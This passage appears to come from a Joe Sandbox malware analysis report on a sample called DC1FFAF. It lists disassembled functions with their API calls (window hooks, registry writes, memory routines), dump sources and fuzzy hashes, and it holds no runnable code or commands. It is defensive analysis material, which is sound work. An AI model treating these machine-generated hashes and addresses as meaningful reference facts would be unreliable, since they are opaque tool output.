                                                                                                                                        • Part of subcall function 0048142C: __EH_prolog3.LIBCMT ref: 00481433
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3H_prolog3_catch
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1882928916-0
                                                                                                                                      • Opcode ID: 30e7677d445e053e664e75bddd9c5a9c09bc669bc9f7573ccb8bfbed9c8ad956
                                                                                                                                      • Instruction ID: 6b1d57b5791c08eddc79c6435afc57e22828dd76bbea3d1c8774934047541804
                                                                                                                                      • Opcode Fuzzy Hash: 30e7677d445e053e664e75bddd9c5a9c09bc669bc9f7573ccb8bfbed9c8ad956
                                                                                                                                      • Instruction Fuzzy Hash: FD219D76E00208DFCF15DFA9C4819DE3BB6BF48314F11806BF9099B251D778AA85CBA5
                                                                                                                                      Function 004041C0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • std::_String_base::_Xlen.LIBCPMT ref: 004041D6
                                                                                                                                        • Part of subcall function 004B28EC: __EH_prolog3.LIBCMT ref: 004B28F3
                                                                                                                                        • Part of subcall function 004B28EC: std::bad_exception::bad_exception.LIBCMTD ref: 004B2910
                                                                                                                                        • Part of subcall function 00406A90: __mbstowcs_l.LIBCMTD ref: 00406AB1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3String_base::_Xlen__mbstowcs_lstd::_std::bad_exception::bad_exception
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3474287224-0
                                                                                                                                      • Opcode ID: 2e8a9c2442f7336ac08afb9df2864dee73c0fa738bbca27436643c0d685d43ad
                                                                                                                                      • Instruction ID: fd10e04c5a226a69ab2b100bef3c1bde7fda2e5d2b15d18a57f99e65d4564726
                                                                                                                                      • Opcode Fuzzy Hash: 2e8a9c2442f7336ac08afb9df2864dee73c0fa738bbca27436643c0d685d43ad
                                                                                                                                      • Instruction Fuzzy Hash: 1621FCB5A00108FBCB04EF95D995DAE77B5EF88304F10816EF905AB291CB34AE41DF98
                                                                                                                                      Function 004393E0 Relevance: 1.6, APIs: 1, Instructions: 63timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetTimer.USER32(?,?,000000A0,?,00000000,?,?), ref: 0043949E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2870079774-0
                                                                                                                                      • Opcode ID: a87f902e74693f11c4bf307f76172a7a9a9a867fd72ad8b95be95340b7157dcc
                                                                                                                                      • Instruction ID: cd9e676ce95de7b91537171b3f5aaa5ea4b491253e78eff6ed405c59858d01d2
                                                                                                                                      • Opcode Fuzzy Hash: a87f902e74693f11c4bf307f76172a7a9a9a867fd72ad8b95be95340b7157dcc
                                                                                                                                      • Instruction Fuzzy Hash: EC214F7460020AAFD704DB44C495FBEBB75FF88310F1442A8E9455F782D771AD82DB94
                                                                                                                                      Function 004663E0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 50dbe89409cb888053fb76f9f872998f27848ce6cc60cb65dacdd3bf2fd6624c
                                                                                                                                      • Instruction ID: c76e09bde795c4fe46ef3841a0cb2bafc993a2a3a13231c91631c67556bcb071
                                                                                                                                      • Opcode Fuzzy Hash: 50dbe89409cb888053fb76f9f872998f27848ce6cc60cb65dacdd3bf2fd6624c
                                                                                                                                      • Instruction Fuzzy Hash: 471130B4A00109EFCB00DFA4D881EAF77B9AB48300F204568F905D7341EA35E951CBB5
                                                                                                                                      Function 00467750 Relevance: 1.6, APIs: 1, Instructions: 55registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,?,00000000,00000004,?,00000004,?,00000000,?,00000000,00020006,?), ref: 004677BD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                      • Opcode ID: 0ba48044aa9e4ae4eb6b88328bf0e38b2e43fc8516cb3a1c9e0c66c6a5602271
                                                                                                                                      • Instruction ID: 2ebcfa9d17986eb71325d784a6630a6435a947b81763b0fd32d8412f5c68b21d
                                                                                                                                      • Opcode Fuzzy Hash: 0ba48044aa9e4ae4eb6b88328bf0e38b2e43fc8516cb3a1c9e0c66c6a5602271
                                                                                                                                      • Instruction Fuzzy Hash: DE1107B5D0420DAFDB04DF94C895BEFBBB8FB48304F108119E605AB280D778AA44CBA5
                                                                                                                                      Function 00423700 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                      • Opcode ID: 29cb66731275e09a6212e7efa68bd3882864407cbe407653025ad40517d201ab
                                                                                                                                      • Instruction ID: 2adc6ca21ac7fa7b300ab3752b0d472a90b0c0ffe1a12c82e549e019072b2f7a
                                                                                                                                      • Opcode Fuzzy Hash: 29cb66731275e09a6212e7efa68bd3882864407cbe407653025ad40517d201ab
                                                                                                                                      • Instruction Fuzzy Hash: 1A1130F4E001199BDF04EF95E942AAEBBB1BF84305F50406EE80567391E7395F44CB96
                                                                                                                                      Function 0046D460 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 64cdd5586d546788c7dbfb2af6ab28a763379571a0170ddf0aa69ced5f6fd1ad
                                                                                                                                      • Instruction ID: 98da97d15c7edad4c4d23ec66b9b1f372d227fa9a60c2f958f3240c303dd1ea5
                                                                                                                                      • Opcode Fuzzy Hash: 64cdd5586d546788c7dbfb2af6ab28a763379571a0170ddf0aa69ced5f6fd1ad
                                                                                                                                      • Instruction Fuzzy Hash: 3B114FB0E00208EFCB14DF95C945B9DB7B4AF48314F1042D9D5046B381EB78AE85CF99
                                                                                                                                      Function 004995A8 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 03cbeaf1e1d5b837a2697f4d21bb2511467de950ca298f1e9df234ab4becf049
                                                                                                                                      • Instruction ID: aacb6c5cef8f7b3e8d2564aa469c1ae9a5ae7e9a5519f31fcedef755be4b23b6
                                                                                                                                      • Opcode Fuzzy Hash: 03cbeaf1e1d5b837a2697f4d21bb2511467de950ca298f1e9df234ab4becf049
                                                                                                                                      • Instruction Fuzzy Hash: 7C014072801209FBCF22AFA9C84299F7F31AF04764F51813EF82415191D7398A62DFD5
                                                                                                                                      Function 0048142C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                      • Opcode ID: d4784ee50d6f1a93e8d924f72a47f93df9caef9570668be1a530da74e2a749c9
                                                                                                                                      • Instruction ID: d7c226338161ac13b20d50535905646eb5503046d73cf07dbfe141cdb14b58f2
                                                                                                                                      • Opcode Fuzzy Hash: d4784ee50d6f1a93e8d924f72a47f93df9caef9570668be1a530da74e2a749c9
                                                                                                                                      • Instruction Fuzzy Hash: FC01D834601102CBDF64BF71C95167E3AA9AB9075DF10483FE4458B3A1DF388C01D749
                                                                                                                                      Function 0043EA60 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(00000000,00000030,00547B10,00000000), ref: 0043EAB8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: a397fa3b46d98615f94a6a93fbd0b72e22b574008d33de415883dc9f6e9e5b0d
                                                                                                                                      • Instruction ID: 21dcef40ffbe506ca60d77ac5ffcdfd558adffc94e984cb90463c33e75a32723
                                                                                                                                      • Opcode Fuzzy Hash: a397fa3b46d98615f94a6a93fbd0b72e22b574008d33de415883dc9f6e9e5b0d
                                                                                                                                      • Instruction Fuzzy Hash: C0012875744208BBDB04DF99DC91FAB77B8AB4C700F108159FA09EB281D674EE51CBA4
                                                                                                                                      Function 00435770 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,00000030,00547B10,00000000), ref: 004357CA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: be5d934c20d5625e6c055d0d835d57355309155be62be871b368ceb2947eddff
                                                                                                                                      • Instruction ID: 349c10eeeb115961019f6908f26c9bf15bfa4cd2911978ed02d6259cb552fa13
                                                                                                                                      • Opcode Fuzzy Hash: be5d934c20d5625e6c055d0d835d57355309155be62be871b368ceb2947eddff
                                                                                                                                      • Instruction Fuzzy Hash: 1F01E8B5354208ABE704CF98DC91FAB37B9EB4C740F108159FA09D7290D675ED11DBA4
                                                                                                                                      Function 00436E10 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,00000030,00547B10,00000000), ref: 00436E70
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 9a0dd01dacbd5f1727ed6df9d66e291bef991d521e405b2dca7051cfb413de65
                                                                                                                                      • Instruction ID: 806d3765ffa53003336d7135ab6ea5f46db141b5238a683dcc7be689ff9f3adb
                                                                                                                                      • Opcode Fuzzy Hash: 9a0dd01dacbd5f1727ed6df9d66e291bef991d521e405b2dca7051cfb413de65
                                                                                                                                      • Instruction Fuzzy Hash: AC01E9B5A0020AABDB04DF98C852FAFBBB4EB48300F008559F909A7341D674A950CBA4
                                                                                                                                      Function 0042AB10 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                      • Opcode ID: a88ed18fe917a237045fb8732100dd61116ca35687ec7e86510119dbe801c6f3
                                                                                                                                      • Instruction ID: 439096b84a525aa7636b4cf08271ce91f12de2ec3ec45ba280f2bb99b0cc6c64
                                                                                                                                      • Opcode Fuzzy Hash: a88ed18fe917a237045fb8732100dd61116ca35687ec7e86510119dbe801c6f3
                                                                                                                                      • Instruction Fuzzy Hash: D20140B5E00208DFCB04DF99D881A9EBBB5AF54304F50856AE8055B351E735EE50CBD6
                                                                                                                                      Function 69EC0AEC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __lock_file.LIBCMT ref: 69EC0B33
                                                                                                                                        • Part of subcall function 69EC2DCA: __getptd_noexit.LIBCMT ref: 69EC2DCA
                                                                                                                                        • Part of subcall function 69EC24F4: __decode_pointer.LIBCMT ref: 69EC24FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__getptd_noexit__lock_file
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3158947991-0
                                                                                                                                      • Opcode ID: 2837a5c8fc3317419e2f4f8c75df480b2f5660aa18272e9ffb6b9a79e1dd1727
                                                                                                                                      • Instruction ID: 61cc6166ab0ec7fd2fdc6aba3b3e1a7a579ffa5f3cf62be275b1d38d5dfb2ae2
                                                                                                                                      • Opcode Fuzzy Hash: 2837a5c8fc3317419e2f4f8c75df480b2f5660aa18272e9ffb6b9a79e1dd1727
                                                                                                                                      • Instruction Fuzzy Hash: 89F0AFB5C01619EBCF01EFA48E0059E7B70BF0071AF20E918F8B456250CB34CA21DB93
                                                                                                                                      Function 0047600D Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,00000030,00000000,00000000,00000000,00000000,?,00471050,?,?,00000000,00000000,00000000,00000000), ref: 00475FDC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                      • Opcode ID: 79bf8f7a6b615ef0d5f7aa96a8deebe4553653f928a6ed862b88e7f979a942fa
                                                                                                                                      • Instruction ID: 3b2b52d1998974276da2b72660f4034855eb947c4e4968d26f43092d4cfda277
                                                                                                                                      • Opcode Fuzzy Hash: 79bf8f7a6b615ef0d5f7aa96a8deebe4553653f928a6ed862b88e7f979a942fa
                                                                                                                                      • Instruction Fuzzy Hash: 00F02471204A826A9335E7319948DBB3BADAF82318706886FE449CA101DB2CDC06C665
                                                                                                                                      Function 00498760 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fclose_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4232755567-0
                                                                                                                                      • Opcode ID: 9186d7f3205cea7981ed8f36ef98f22fafe45b5b18630c92c13c0ca3241d64da
                                                                                                                                      • Instruction ID: 78398e49683211cc24eca9dd7e70ac09c007ab9177552ababbe4633548801e81
                                                                                                                                      • Opcode Fuzzy Hash: 9186d7f3205cea7981ed8f36ef98f22fafe45b5b18630c92c13c0ca3241d64da
                                                                                                                                      • Instruction Fuzzy Hash: CBF044758006049ADF21ABAE8C4265E7EA05F46334F7186AFA478961D1CF3C46425B5D
                                                                                                                                      Function 004A2959 Relevance: 1.5, APIs: 1, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 004A2965
                                                                                                                                        • Part of subcall function 004983AD: __FF_MSGBANNER.LIBCMT ref: 004983D0
                                                                                                                                        • Part of subcall function 004983AD: __NMSG_WRITE.LIBCMT ref: 004983D7
                                                                                                                                        • Part of subcall function 004983AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,004A296A,?,00000001,?,?,004A1322,00000018,00516498,0000000C,004A13B3), ref: 00498424
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 501242067-0
                                                                                                                                      • Opcode ID: 41f3a6c2942a272da3b8c2da3e481a3685ff66c79f4208364736709cf73e20a7
                                                                                                                                      • Instruction ID: 743c137a69e81ded191212f10e85271379ba4febffafb31bc112533e0ab945fc
                                                                                                                                      • Opcode Fuzzy Hash: 41f3a6c2942a272da3b8c2da3e481a3685ff66c79f4208364736709cf73e20a7
                                                                                                                                      • Instruction Fuzzy Hash: E0F0A776A041241B8B21A77E9C0154B3E989BE3BB4B14067BF479C7291D9588801A199
                                                                                                                                      Function 0046D710 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 8ede0347c3292dc42b987ad435d5c9eae7628609dd55ac6fe15e18ba0b887cc7
                                                                                                                                      • Instruction ID: 8f766fc97e62d304292567d9de64d4f424c018f4206d254acd2a905eaa55dceb
                                                                                                                                      • Opcode Fuzzy Hash: 8ede0347c3292dc42b987ad435d5c9eae7628609dd55ac6fe15e18ba0b887cc7
                                                                                                                                      • Instruction Fuzzy Hash: D5F0A974E0020C9ADF20DF60DC46BEA7778AB55308F4001ADE54816242EA746F88CF57
                                                                                                                                      Function 00473392 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0048142C: __EH_prolog3.LIBCMT ref: 00481433
                                                                                                                                      • SetWindowsHookExA.USER32(00000000,00000005,0047313F,00000000,00000000,?,0047347D,?,?,?,00000000,0000012C,00000000,00000000,00000000), ref: 004733D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3HookWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1255626008-0
                                                                                                                                      • Opcode ID: 9de2d0d610ae6561a9fbde2f2ee51e6c421d515413911aec8996dbe92f483789
                                                                                                                                      • Instruction ID: 450faac8285b04c7d25a7e13dcd5b2e74a6d4a2e40c2a415ce06db2419a02be6
                                                                                                                                      • Opcode Fuzzy Hash: 9de2d0d610ae6561a9fbde2f2ee51e6c421d515413911aec8996dbe92f483789
                                                                                                                                      • Instruction Fuzzy Hash: ABF02735640711A7CA302E739806B977A98CBA0B76F10452BF98996240DE7DDD04C3AD
                                                                                                                                      Function 00465720 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00446160: _memset.LIBCMT ref: 004462CF
                                                                                                                                        • Part of subcall function 00446160: _memset.LIBCMT ref: 004462E5
                                                                                                                                      • IWBE.586030GBC ref: 00465743
                                                                                                                                        • Part of subcall function 004655E0: _strlen.LIBCMT ref: 00465699
                                                                                                                                        • Part of subcall function 004655E0: _strlen.LIBCMT ref: 004656BD
                                                                                                                                        • Part of subcall function 004655E0: _strlen.LIBCMT ref: 004656E7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen$_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1297213449-0
                                                                                                                                      • Opcode ID: 67625ada5f6095ca5c2d2bc5717c254359c9f617d6c413ba946766781576b588
                                                                                                                                      • Instruction ID: 7dc4bb887ba8248d3d0245faa83c061a82098d386fb4555201ba3560dabd192e
                                                                                                                                      • Opcode Fuzzy Hash: 67625ada5f6095ca5c2d2bc5717c254359c9f617d6c413ba946766781576b588
                                                                                                                                      • Instruction Fuzzy Hash: 2BE09270140208F6D714BFB2AD0A78E32A89B0170EF21805FF405A2182FEBD1A40E66F
                                                                                                                                      Function 004A299E Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_impl
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175177749-0
                                                                                                                                      • Opcode ID: 3e3c6ff900ca90ba14dfb3bc2699dcfbe5d2c980f383c40a957cd6f5dd2e2fb9
                                                                                                                                      • Instruction ID: fe166ecc73cb8c1262f7f7846e5ad658f5dd17a13fd75cf66b34192f736b4663
                                                                                                                                      • Opcode Fuzzy Hash: 3e3c6ff900ca90ba14dfb3bc2699dcfbe5d2c980f383c40a957cd6f5dd2e2fb9
                                                                                                                                      • Instruction Fuzzy Hash: 9AE0E536A0129837CB3169BA5C05ADB3F598BE3779F140267FD28863D0D6698801F2A6
                                                                                                                                      Function 00467340 Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegCreateKeyExA.KERNEL32(?,?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 0046736B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 4df4e4dfefa06a6f890f9df18e31ce0bae71e33646126c55b8bdff233f28aa8c
                                                                                                                                      • Instruction ID: d95fb53c4885e372a4ff9b4c94267eb5fd06fad5ffa157715ada3d6c6981bdde
                                                                                                                                      • Opcode Fuzzy Hash: 4df4e4dfefa06a6f890f9df18e31ce0bae71e33646126c55b8bdff233f28aa8c
                                                                                                                                      • Instruction Fuzzy Hash: CFF09271A4020CFBE710DAD4CC46FEEB3BC9B04704F108155BE05AB2C1E6B8AA44DBA5
                                                                                                                                      Function 69EB0164 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
